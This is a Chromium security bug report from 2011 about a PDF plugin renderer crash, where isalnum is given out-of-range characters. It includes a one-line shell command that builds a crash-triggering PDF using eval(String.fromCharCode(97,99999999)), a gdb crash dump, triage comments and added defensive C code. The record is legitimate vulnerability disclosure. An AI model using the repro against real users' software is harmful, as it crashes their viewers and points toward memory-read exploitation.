Project: chromium
Status: Fixed
Closed: Oct 2011
OS: All
Pri: 1
Type: Bug-Security
Renderer crash with PDF at isalnum
Reported by aohe...@gmail.com, Oct 2 2011
VULNERABILITY DETAILS
Opening the attached PDF document causes a renderer crash due to an invalid read at isalnum with an address like 0xffffffff800acf66.

VERSION
Chrome Version: 14.0.835.186 stable (also beta and dev)
Operating System: Linux, Debian 6.0.2 (32- and 64-bit)

REPRODUCTION CASE
Note: the repro is derived from a malware sample.

 $ google-chrome isalnum.pdf

The repro still has a compressed section of JS, which in the original file contains a large array followed by some deobfuscation code. Based on the crash location I'd guess it happens after decompression while parsing or running the JS, but I haven't yet been able to decompress the stream and have a look at what is happening. The original JS stream does not cause this.

I'll try to minimize the repro further later today.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State: 
Program received signal SIGSEGV, Segmentation fault.
0x00007fffee977773 in isalnum () from /lib/libc.so.6
(gdb) x/3i $rip
=> 0x7fffee977773 <isalnum+19>: movzwl (%rax,%rdi,2),%eax
   0x7fffee977777 <isalnum+23>: and    $0x8,%eax
   0x7fffee97777a <isalnum+26>: retq   
(gdb) i r
rax            0x7ffff466c82c   140737293764652
rbx            0x7fffffffb6e0   140737488336608
rcx            0x9e     158
rdx            0xffffffffffffff80       -128
rsi            0x7fffffffb720   140737488336672
rdi            0xffffffffbe021b9d       -1107158115
rbp            0x7fffffffb720   0x7fffffffb720
rsp            0x7fffffffb338   0x7fffffffb338
r8             0x8      8
r9             0x101010101010101        72340172838076673
r10            0x3900000055     244813135957
r11            0x7fffee9ca42a   140737196631082
r12            0xbe021b9d       3187809181
r13            0x7fffea0b7cbc   140737120009404
r14            0x7fffe6f00b60   140737067879264
r15            0x73     115
rip            0x7fffee977773   0x7fffee977773 <isalnum+19>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) bt 10
#0  0x00007fffee977773 in isalnum () from /lib/libc.so.6
#1  0x00007fffe9efab95 in ?? () from /opt/google/chrome/libpdf.so
#2  0x00007fffe9efb5e9 in ?? () from /opt/google/chrome/libpdf.so
#3  0x00007fffe9ee01c6 in ?? () from /opt/google/chrome/libpdf.so
#4  0x00007fffe9edef83 in ?? () from /opt/google/chrome/libpdf.so
#5  0x00007fffe9edf0a8 in ?? () from /opt/google/chrome/libpdf.so
#6  0x00007fffe9edf188 in ?? () from /opt/google/chrome/libpdf.so
#7  0x00007fffe9edf293 in ?? () from /opt/google/chrome/libpdf.so
#8  0x00007fffe9edf483 in ?? () from /opt/google/chrome/libpdf.so
#9  0x00007fffe9edf5c3 in ?? () from /opt/google/chrome/libpdf.so
(More stack frames follow...)
Attachment: isalnum.pdf (5.5 KB)
Comment 1 by cdn@chromium.org, Oct 3 2011
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals Feature-PDF SecSeverity-High OS-All Mstone-14
Status: Available
Labels: -Mstone-14 Mstone-15
Owner: cevans@chromium.org
Status: Assigned
I'll deal with this when I get back (next week). Aki, awesome if you can get a minimized repro by then.
Comment 3 by aohe...@gmail.com, Oct 10 2011
I made some progress. The crash occurs when eval() is given bad data under a few layers of obfuscation. There is a code point 7039 in the argument string, which is somehow different from a visually indistinguishable string constructed with String.fromCharCode. I'll post a better repro a bit later.
Comment 4 by aohe...@gmail.com, Oct 10 2011
Got it: 
 $ echo "%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (eval(String.fromCharCode(97,99999999)))>> trailer<</Root 1 0 R>>" > repro.pdf;
 $ google-chrome repro.pdf

Crash moves with the high code point.
Attachment: repro.pdf (141 bytes)
Nice Aki, thanks! I was planning to tackle this today, too, so good timing.
Labels: -SecSeverity-High SecSeverity-Medium
Status: Started
OOB read due to failure to honor the contract of isalnum:
---
The c argument is an int, the value of which the application shall ensure is representable as an unsigned char or equal to the value of the macro EOF. If the argument has any other value, the behavior is undefined.
---

glibc takes the liberty of crashing for its particular view of "undefined", which it is of course permitted to do.
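The range check that the quoted contract demands, as an added example in C; it is not code from this page or from the PDF plugin, the function names are my own, and the sample code-unit buffer is constructed:

```c
#include <ctype.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* The contract quoted above (C/POSIX): the argument to isalnum() and the other
 * <ctype.h> functions must be representable as unsigned char, or be EOF. glibc
 * implements these functions as a table lookup indexed by the argument (the
 * movzwl (%rax,%rdi,2) in the crash dump), which is why an out-of-range value
 * becomes an out-of-bounds read rather than an error. */
int ctype_arg_is_valid(int c)
{
    return c == EOF || (c >= 0 && c <= UCHAR_MAX);
}

/* Hardened classification of one UTF-16 code unit, as a JavaScript string
 * holds them. The unhardened form, isalnum(cu), passes code units such as 7039
 * (comment 3) straight through and violates the contract; here anything above
 * 0x7F is classified as "not alphanumeric" without touching the lookup table.
 * Only ASCII letters and digits count, which is what a lexer scanning for
 * identifier characters normally wants. */
int code_unit_is_ascii_alnum(uint16_t cu)
{
    if (cu > 0x7F)
        return 0;
    return isalnum((unsigned char)cu) != 0;
}

/* Count the ASCII alphanumerics in a code-unit buffer without ever reaching
 * the OOB read, whatever the buffer contains. */
size_t count_ascii_alnum(const uint16_t *s, size_t n)
{
    size_t count = 0;
    for (size_t i = 0; i < n; i++)
        count += (size_t)code_unit_is_ascii_alnum(s[i]);
    return count;
}

int main(void)
{
    /* Constructed sample: 'a', the code point 7039 from comment 3, '1', '_' */
    const uint16_t sample[] = { 'a', 7039, '1', '_' };
    printf("7039 is a valid ctype argument? %d\n", ctype_arg_is_valid(7039));
    printf("ASCII alphanumerics in sample: %zu\n",
           count_ascii_alnum(sample, sizeof sample / sizeof sample[0]));
    return 0;
}
```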
Labels: -Restrict-View-SecurityTeam -Mstone-15 Restrict-View-SecurityNotify Mstone-16 SecImpacts-Stable SecImpacts-Beta reward-topanel
Status: FixUnreleased
Safest to let this one roll into M16, I think.
r1140 on PDF trunk.
Labels: -reward-topanel reward-500 reward-unpaid
@aohelin: interesting bug. It's hard to rule out a bitwise recovery of the OOB content, hence a $500 Chromium Security Reward :D

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Comment 10 by aohe...@gmail.com, Dec 11 2011
@scarybeasts excellent :)
Labels: -reward-unpaid
Payment in system.
Comment 12 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed.
Cc: emily.zh...@gmail.com
Project Member Comment 14 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 15 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-Internals -Feature-PDF -SecSeverity-Medium -Mstone-16 -SecImpacts-Stable -SecImpacts-Beta Cr-Content-Plugins-PDF Security-Impact-Beta Security-Severity-Medium Cr-Internals Security-Impact-Stable Type-Bug-Security M-16
Project Member Comment 16 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 17 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 19 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 20 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Medium Security_Severity-Medium
Project Member Comment 21 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 22 by bugdroid1@chromium.org, Apr 6 2013
Labels: Cr-Blink
Project Member Comment 23 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content-Plugins-PDF Cr-Internals-Plugins-PDF
Project Member Comment 24 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 25 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 26 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic